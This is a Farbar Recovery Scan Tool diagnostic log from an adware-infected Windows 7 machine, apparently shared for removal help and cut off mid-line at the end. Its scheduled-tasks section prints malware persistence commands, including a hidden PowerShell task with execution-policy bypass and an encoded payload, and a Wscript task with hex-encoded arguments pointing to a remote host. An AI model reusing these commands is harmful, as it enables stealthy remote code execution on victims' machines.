Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:05-03-2016 01 Executado por Claudemir (2016-03-13 15:38:53) Executando a partir de C:\Users\Claudemir\Downloads Windows 7 Ultimate Service Pack 1 (X64) (2015-11-29 15:58:47) Modo da Inicialização: Normal ========================================================== ==================== Contas: ============================= Administrador (S-1-5-21-1295429606-633391922-1787662347-500 - Administrator - Disabled) B25E1107F5EB44389B09 (S-1-5-21-1295429606-633391922-1787662347-1003 - Limited - Enabled) Claudemir (S-1-5-21-1295429606-633391922-1787662347-1000 - Administrator - Enabled) => C:\Users\Claudemir Convidado (S-1-5-21-1295429606-633391922-1787662347-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1295429606-633391922-1787662347-1002 - Limited - Enabled) ==================== Central de Segurança ======================== (Se uma entrada for incluída na fixlist, será removida.) AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programas Instalados ====================== (Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.) µTorrent (HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.) 1.0.0.1 (HKLM-x32\...\Yeaplayer) (Version: 1.0.0.1 - ) Adblock Plus para o IE (32 e 64 bits) (HKLM\...\{C73FE631-8592-4C2C-A13A-72601EAB8693}) (Version: 1.5 - Eyeo GmbH) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9120 - Adobe Systems Inc.) Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated) Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.228 - Adobe Systems Incorporated) Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated) Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated) Advanced Calendar 2.0.0.11189 (HKLM\...\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}) (Version: 2.0.0.11189 - MEIXIAN XIE) <==== ATENÇÃO Advanced SystemCare 8 (HKLM-x32\...\Advanced SystemCare 8_is1) (Version: 8.0.3 - IObit) AnyFlix (HKLM-x32\...\AnyFlix.ns) (Version: - ) Ares 2.3.6 (HKLM-x32\...\Ares) (Version: 2.3.6-Build#3060 - Seekar Ltd) aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp) BlueStacks App Player (HKLM-x32\...\{73535349-D34A-4B9A-9BEE-E5A8C186D1B0}) (Version: 0.9.1.4057 - BlueStack Systems, Inc.) Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ATENÇÃO Broadcom Wireless Utility (HKLM\...\Broadcom Wireless Utility) (Version: 5.60.48.55 - Broadcom Corporation) Chromium (HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\Chromium) (Version: 46.0.2480.0 - Chromium) Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) CleanBrowser (HKLM-x32\...\CleanBrowser) (Version: - ) DriverScanner (HKLM-x32\...\{C2F8CA82-2BD9-4513-B2D1-08A47914C1DA}_is1) (Version: 4.0.16.0 - Uniblue Systems Ltd) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.8.1124 - Foxit Software Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.) Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden Hostify version 1.0 (HKLM-x32\...\Hostify_is1) (Version: 1.0 - CSDI) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2993 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.9.0.1001 - Intel Corporation) IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 4.1.5.24 - IObit) istartpageing uninstall (HKLM-x32\...\istartpageing uninstall) (Version: - istartpageing) <==== ATENÇÃO Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation) Killer Bugs v3 for Pro Tools 10.3.7 5.7.7 (HKLM-x32\...\Killer Bugs v3 for Pro Tools 10.3.7 5.7.7) (Version: 5.7.7 - Sovivoloko) K-Lite Mega Codec Pack 11.8.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.8.0 - ) Loquendo TTS 7 Engine Full Distribution (HKLM-x32\...\{16096EE7-3343-4835-B9AF-C63492BD89B3}) (Version: 7.5.0 - Loquendo) Loquendo TTS 7 Felipe Multimedia High Quality (HKLM-x32\...\{A1614B8B-E966-4512-BEA9-13A4779983FF}) (Version: 7.3.0 - Loquendo) Loquendo TTS 7 Portuguese (HKLM-x32\...\{C278A74A-707D-49B5-B847-651B4B80EDED}) (Version: 7.4.0 - Loquendo) Marvell Miniport Driver (HKLM-x32\...\Marvell Miniport Driver) (Version: 11.45.4.3 - Marvell) Max Driver Updater (HKLM-x32\...\Max Driver Updater_is1) (Version: 2.7.1086.16649 - csmedia.com) <==== ATENÇÃO Mediatek RT2870 Wireless LAN Card (HKLM-x32\...\{28DA7D8B-F9A4-4F18-8AA0-551B1E084D0D}) (Version: 1.5.38.101 - MediatekWiFi) Melodyne 3.2 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.2.0202 - Celemony Software GmbH) Melodyne 3.2 (x32 Version: 3.2.0202 - Celemony Software GmbH) Hidden Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUSR) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MobilePCStarterKit 000.005030264 (HKLM-x32\...\mpck_en_005030264_is1) (Version: - MOBILEPCSTARTERKIT) <==== ATENÇÃO mysites123 uninstall (HKLM-x32\...\mysites123 uninstall) (Version: - mysites123) MyStart Toolbar (HKLM-x32\...\mystarttb) (Version: 5.6.0.6 - Visicom Media Inc.) Nero 2016 (HKLM-x32\...\{4297E807-5633-466A-8AC0-5AC48D310471}) (Version: 17.0.02000 - Nero AG) Nero 2016 Content Pack (HKLM-x32\...\{006F5CFF-ED35-41AF-9B2A-F52B0F545BF4}) (Version: 17.0.00200 - Nero AG) Nero Info (HKLM-x32\...\{F030BFE8-8476-4C08-A553-233DE80A2BE1}) (Version: 16.0.2000 - Nero AG) Noise Reduction Plug-In 2.0 (HKLM-x32\...\{847C6940-D852-11E2-81D2-F04DA23A5C58}) (Version: 2.0.596 - Sony) Opera Stable 34.0.2036.42 (HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\Opera 34.0.2036.42) (Version: 34.0.2036.42 - Opera Software) Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation) Palikan (HKLM-x32\...\Palikan) (Version: - ) PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden Prerequisite installer (x32 Version: 17.0.0002 - Nero AG) Hidden PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.9.6 - PBNGTBJJPYO) <==== ATENÇÃO Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7464 - Realtek Semiconductor Corp.) Revisores de Texto do Microsoft Office 2013 – Português do Brasil (x32 Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Satellite Comma (HKLM-x32\...\SoftwareUpdater) (Version: 1.0.0.0 - Satellite Comma) <==== ATENÇÃO Search Window Results (HKLM-x32\...\Search Window Results) (Version: 2.0.5916.14783 - Search Window Results) <==== ATENÇÃO Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\...\{91150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUSR_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version: - Microsoft) Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO Shopper-Pro (HKLM-x32\...\ShopperPro3) (Version: - ) <==== ATENÇÃO SlimCleaner Plus (HKLM\...\{FDBF32ED-3777-42C8-9272-380994F04EC9}) (Version: 2.5.0 - Slimware Utilities Holdings, Inc.) SlimDrivers (HKLM-x32\...\{746AB259-6474-4111-8966-1C62F9A6E063}) (Version: 2.3.1 - SlimWare Utilities, Inc.) Software de dispositivo do Chipset Intel® (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden Sound Forge Pro 11.0 (HKLM-x32\...\{437C8730-3505-11E3-9509-F04DA23A5C58}) (Version: 11.0.272 - Sony) SpaceSoundPro (HKLM\...\SpaceSoundPro) (Version: 1.0 - ) <==== ATENÇÃO SpaceSoundPro Service (HKLM-x32\...\zz.11215.ssp) (Version: 1.0.0 - CSDI) <==== ATENÇÃO Stashimi Stub Installer (x32 Version: 18.001.1 - Nero AG) Hidden Surfing Protection (HKLM-x32\...\IObit Surfing Protection_is1) (Version: 1.2 - IObit) TextAloud 3.0 (HKLM-x32\...\TextAloud3_is1) (Version: 3.0.87.0 - NextUp.com) Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{90150000-012B-0416-0000-0000000FF1CE}_Office15.PROPLUSR_{7BDD179E-C954-438B-937D-EB411B701EAB}) (Version: - Microsoft) Vegas Pro 13.0 (64-bit) (HKLM\...\{D0360940-CCC6-11E3-B9C6-F04DA23A5C58}) (Version: 13.0.310 - Sony) Wajam (HKLM-x32\...\WNEn) (Version: 1.61.10.12 - Wajam) <==== ATENÇÃO WebShield (HKLM-x32\...\WebShield) (Version: 3.0.91 - Irrational Number Applications) WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.8800 - Broadcom Corporation) WIN (HKLM-x32\...\win_en_77_is1) (Version: - ) <==== ATENÇÃO WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) YellowSend (HKLM-x32\...\YSPackage) (Version: - CMI Limited) yessearches Uninstall (HKLM-x32\...\obs Uninstall) (Version: - ) <==== ATENÇÃO yoursearching uninstall (HKLM-x32\...\yoursearching uninstall) (Version: - yoursearching) <==== ATENÇÃO YTDownloader (HKLM-x32\...\YTDownloader) (Version: - YTDownloader) <==== ATENÇÃO ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {15FB87BB-9563-4C3B-9AFC-2F0465DB812B} - System32\Tasks\{7A0A0547-0F0B-0B0F-7811-7D040D0F110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsA (a entrada de dados tem 9252 mais caracteres). Task: {1BF52EA1-FC71-4E31-9C3A-9F1A93C4CF22} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation) Task: {1E3C49DC-7C46-47A8-869A-0F3028D09FB4} - System32\Tasks\ASC8_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare 8\Monitor.exe [2014-11-07] (IObit) Task: {1F5EEA01-1A95-448C-9741-F4AE85C65A18} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Claudemir) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: {24811237-1261-4BCA-9F6B-C88A38B44E00} - System32\Tasks\Nero\Nero Info => C:\Program Files (x86)\Common Files\Nero\Nero Info\NeroInfo.exe [2015-06-04] (Nero AG) Task: {4317D28C-1D42-44FD-BEB9-602C36F77F55} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2015-12-23] () Task: {44D744B1-CECA-4BB6-B9F6-D2303715D713} - System32\Tasks\AdobeAAMUpdater-1.0-Claudemir-PC-Claudemir => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated) Task: {57D20AB2-67A0-42A6-991A-DD99D353FE40} - System32\Tasks\Uninstaller_SkipUac_Claudemir => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2014-11-04] (IObit) Task: {646EF24A-8A04-4CA5-A049-2877245150A8} - System32\Tasks\Opera scheduled Autoupdate 1448833205 => C:\Users\Claudemir\AppData\Local\Programs\Opera\launcher.exe [2015-12-15] (Opera Software) Task: {6D1F435C-3E09-4AC5-A17D-4C1B9DFD2278} - System32\Tasks\Govrad => C:\PROGRA~1\SHOPPE~1\Hulbid.bat Task: {6D47E3E4-61DF-42DF-A0D8-06FEC6E6091C} - System32\Tasks\Uhnuurimde => C:\ProgramData\Uhnuurimde\1.0.7.1\erihsodo.exe [2015-12-24] () Task: {6EC9D7B0-3B6A-49D1-9560-F38DE0175EFA} - System32\Tasks\Palikan nore => Wscript.exe "C:\ProgramData\{87FF6F3C-D77D-BEBA-66FB-CE38B6791DB6}\2.3.5.56\taco.txt" "433a2f50726f6772616d446174612f7b38374646364633432d443737442d424542412d363646422d4345333842363739314442367d2f322e332e352e35362f6e6f72652e646c6c" "687474703a2f2f73616f2e6b616e72712e636f6d2f" "--IsErIk" "//B" "//E:jscript" Task: {7A01BE63-518C-4F21-87C0-F3CF7D642681} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-29] (Google Inc.) Task: {8F4A48C7-4A9B-4ECA-B694-FB215E68E2A9} - System32\Tasks\PFExe => C:\Windows\system32\config\systemprofile\AppData\Local\PriceFountain\pricefountain.exe <==== ATENÇÃO Task: {A3767CD1-1F94-4EF7-B120-40EAB1681249} - System32\Tasks\ASC8_SkipUac_Claudemir => C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASC.exe [2014-11-07] (IObit) Task: {A51A8BCD-508B-4112-87F0-FA21BB0466B4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-29] (Google Inc.) Task: {C4B92AE1-9741-4571-A7C6-1B409C5E3887} - System32\Tasks\DNS Monitoring => C:\Windows\system32\regsvr32.exe [2009-07-13] (Microsoft Corporation) Task: {C770ABBE-FAB7-4CA2-AED9-7E2E6A5585E3} - System32\Tasks\MAXDriverUpdater_UPDATES => C:\Program Files (x86)\Max Driver Updater\maxdu.exe [2015-07-06] (csdimedia.com) <==== ATENÇÃO Task: {D01F8AA7-FB05-4048-A47E-4B811771630E} - System32\Tasks\MAXDriverUpdaterRunAtStartup => C:\Program Files (x86)\Max Driver Updater\maxdu.exe [2015-07-06] (csdimedia.com) <==== ATENÇÃO Task: {D9B18597-9A40-4DA2-BE17-32DBCD8C3FB4} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {DA924B38-4257-4BFC-BDBB-1ACA84223BA1} - System32\Tasks\Food Component => Rundll32.exe "C:\Users\Claudemir\AppData\Local\Food Component\{44DD55AA-78EE-EC94-77A5-7E1B04C6D1CB}\FoodComponent.dll",#1 <==== ATENÇÃO Task: {DF7B0BC3-3D48-4F05-9517-48C362DF22BC} - System32\Tasks\ClaudemirBuffedThroughV2 => Rundll32.exe PrickiestStereoscopically.dll,main 7 1 <==== ATENÇÃO Task: {E0438F59-5EE3-4FC5-A59A-0C8A176FD751} - System32\Tasks\svchost => C:\Users\Claudemir\AppData\Local\Temp\setup_685.exe <==== ATENÇÃO Task: {E9B243B3-4C06-47E6-AA13-8DCA395F00E3} - System32\Tasks\Food Component2 => Rundll32.exe "C:\Users\Claudemir\AppData\Local\Food Component\{44DD55AA-78EE-EC94-77A5-7E1B04C6D1CB}\jutxms.dll",#1 <==== ATENÇÃO Task: {EA2BE0F8-1F5B-4AA1-9B31-993BD3E47382} - System32\Tasks\SlimDrivers Startup => C:\Program Files (x86)\SlimDrivers\SlimDrivers.exe [2015-08-19] (SlimWare Utilities, Inc.) Task: {F2E321F5-C237-4AD2-B2BB-47B0E1222FF7} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\Windows\Tasks\dsmonitor.job => C:\Program Files (x86)\Uniblue\DriverScanner\dsmonitor.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\MAXDriverUpdater_UPDATES.job => C:\Program Files (x86)\Max Driver Updater\maxdu.exe <==== ATENÇÃO Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Claudemir).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: C:\Windows\Tasks\SlimDrivers Startup.job => C:\Program Files (x86)\SlimDrivers\SlimDrivers.exe ==================== Atalhos ============================= (As entradas podem ser listadas para serem restauradas ou removidas.) ShortcutWithArgument: C:\Users\Claudemir\Desktop\Opera.lnk -> C:\Users\Claudemir\AppData\Local\Programs\Opera\launcher.exe (Opera Software) -> hxxp://www.yeabests.cc/ ShortcutWithArgument: C:\Users\Claudemir\Desktop\Yeabeats Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeabests.cc/ ShortcutWithArgument: C:\Users\Claudemir\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Users\Claudemir\AppData\Local\Programs\Opera\launcher.exe (Opera Software) -> hxxp://www.mysites123.com/?type=sc&ts=1457754467&z=5a459aa1ce7f8c094260564g2z2w2mbm8w2z0z5qew&from=tt4u&uid=SAMSUNGXHM321HI_S26VJ9FZB46429 ShortcutWithArgument: C:\Users\Claudemir\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeabests.cc/ ShortcutWithArgument: C:\Users\Claudemir\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk -> C:\Users\Claudemir\AppData\Local\Programs\Opera\launcher.exe (Opera Software) -> hxxp://www.mysites123.com/?type=sc&ts=1457754467&z=5a459aa1ce7f8c094260564g2z2w2mbm8w2z0z5qew&from=tt4u&uid=SAMSUNGXHM321HI_S26VJ9FZB46429 ShortcutWithArgument: C:\Users\Claudemir\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Yeabeats Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeabests.cc/ ShortcutWithArgument: C:\Users\Claudemir\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4a455b7beb4eae5c\Chromium.lnk -> C:\Users\Claudemir\AppData\Local\Chromium\Application\chrome.exe (The Chromium Authors) -> hxxp://www.mysites123.com/?type=sc&ts=1457754467&z=5a459aa1ce7f8c094260564g2z2w2mbm8w2z0z5qew&from=tt4u&uid=SAMSUNGXHM321HI_S26VJ9FZB46429 --disable-quic ==================== Módulos Carregados (Whitelisted) ============== 2015-12-30 14:08 - 2015-12-30 14:08 - 03587000 _____ () C:\ProgramData\System32\SafeGuard64.dll 2015-10-22 06:57 - 2015-10-22 06:57 - 00112560 _____ () C:\Program Files (x86)\YTDownloader\BrowserHelperSrv.exe 2016-03-11 20:10 - 2016-03-11 20:10 - 00209920 _____ () C:\Program Files (x86)\2C0530A0-1456836757-11B2-8000-C1515901109B\knsyE65E.tmp 2016-03-01 10:01 - 2016-03-01 10:02 - 00225792 _____ () C:\Windows\SysWOW64\config\systemprofile\AppData\Local\2C0530A0-1456826178-11B2-8000-C1515901109B\snszE419.tmp 2016-02-17 14:51 - 2015-12-10 09:56 - 00193456 _____ () C:\Program Files (x86)\SkypeUpdateEx\SkypeUpdateEx.exe 2016-02-18 08:35 - 2016-02-18 08:35 - 01220608 _____ () C:\Program Files\Common Files\ShopperPro3\spbiu.exe 2016-03-11 22:11 - 2016-03-11 22:10 - 00152256 _____ () C:\Program Files (x86)\SFK\SSFK.exe 2015-12-25 05:42 - 2015-12-25 05:42 - 00141960 _____ () C:\Program Files (x86)\CalendarTool\2.0.0.11189\CalendarServ.exe 2015-12-25 05:42 - 2015-12-25 05:42 - 03934344 _____ () C:\Program Files (x86)\CalendarTool\2.0.0.11189\Calendar.exe 2015-12-25 05:42 - 2015-12-25 05:42 - 00148104 _____ () C:\Program Files (x86)\CalendarTool\2.0.0.11189\CalendarEntry.dll 2016-03-11 21:34 - 2016-03-11 21:34 - 02972160 _____ () c:\program files\WNEn\f83d4af839615b06867ba7f633b95f53.exe 2016-03-01 09:54 - 2016-03-01 09:54 - 00416256 _____ () C:\Program Files (x86)\2C0530A0-1456836757-11B2-8000-C1515901109B\hnsdD9BD.tmp 2015-12-26 05:59 - 2015-12-26 05:59 - 00158720 _____ () C:\Users\Claudemir\AppData\Local\2C0530A0-1457734033-11B2-8000-C1515901109B\qnsd22AF.tmp 2016-03-01 09:53 - 2016-03-01 09:54 - 00307712 _____ () C:\Program Files (x86)\2C0530A0-1456836757-11B2-8000-C1515901109B\jnst2FC7.tmp 2016-03-11 21:34 - 2016-03-11 21:34 - 02432000 _____ () c:\program files\wnen\748f455174805346d8a21536e3d2fae6.exe 2016-03-11 21:34 - 2016-03-11 21:34 - 02972160 _____ () c:\program files\wnen\f83d4af839615b06867ba7f633b95f53.exe 2016-03-13 15:13 - 2016-03-13 15:13 - 12078592 _____ () c:\program files\wnen\WNEnlibs\iaxnqa.dll 2016-03-11 22:11 - 2016-03-11 13:10 - 03154608 _____ () C:\Users\Claudemir\AppData\Local\mpck_en_005030264\upmpck_en_005030264.exe 2015-11-29 13:41 - 1999-12-31 21:00 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2016-01-27 10:30 - 2016-01-26 11:54 - 02415616 _____ () C:\ProgramData\msiql.exe 2016-01-04 05:54 - 2016-01-04 05:54 - 00148641 _____ () C:\Windows\SysWOW64\config\systemprofile\AppData\Local\2C0530A0-1456826178-11B2-8000-C1515901109B\pnszE41C.exe 2016-03-01 09:58 - 2016-03-01 10:01 - 00562688 _____ () C:\Windows\SysWOW64\config\systemprofile\AppData\Local\2C0530A0-1456826178-11B2-8000-C1515901109B\onszE41B.tmp 2016-02-18 15:08 - 2016-02-18 08:37 - 02720256 _____ () C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10643\jsdrv.exe 2016-03-11 22:11 - 2016-03-11 13:10 - 03993776 _____ () C:\Program Files (x86)\mpck_en_005030264\mpck_en_005030264.exe 2016-03-11 22:13 - 2016-03-10 10:58 - 03992792 _____ () C:\Program Files (x86)\win_en_77\win_en_77.exe 2016-03-13 14:19 - 2016-03-13 14:19 - 01269464 ____N () C:\Program Files (x86)\Common Files\8f23bb0e-d21d-43d3-bd7b-a0fba15a3b5e\updater.exe 2015-12-07 13:53 - 2013-10-25 11:08 - 00517408 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\sqlite3.dll 2015-12-30 14:08 - 2015-12-30 14:08 - 02771896 _____ () C:\ProgramData\System32\SafeGuard32.dll 2015-12-07 13:53 - 2013-01-15 17:48 - 00348992 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\madExcept_.bpl 2015-12-07 13:53 - 2013-01-15 17:48 - 00183616 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\madBasic_.bpl 2015-12-07 13:53 - 2013-01-15 17:48 - 00051008 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\madDisAsm_.bpl 2015-12-07 13:53 - 2014-10-16 09:26 - 00622880 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\ProductStatistics.dll 2015-12-24 18:09 - 2015-12-24 18:09 - 00028160 _____ () C:\Users\Claudemir\AppData\Local\Food Component\{44DD55AA-78EE-EC94-77A5-7E1B04C6D1CB}\FoodComponent.dll 2015-12-24 18:09 - 2015-12-24 18:09 - 00012800 _____ () C:\Users\Claudemir\AppData\Local\Food Component\{44DD55AA-78EE-EC94-77A5-7E1B04C6D1CB}\jutxms.dll 2015-12-24 18:09 - 2015-12-24 18:09 - 00011264 _____ () C:\Users\Claudemir\AppData\Local\Food Component\{44DD55AA-78EE-EC94-77A5-7E1B04C6D1CB}\{6F2F1C29-D521-2B8A-7CEC-AE08E1C46CDE}.dat 2016-02-17 14:51 - 2015-12-08 10:12 - 00126896 _____ () C:\Program Files (x86)\SkypeUpdateEx\SkypeUpdate.dll 2015-12-25 05:42 - 2015-12-25 05:42 - 00543368 _____ () C:\Program Files 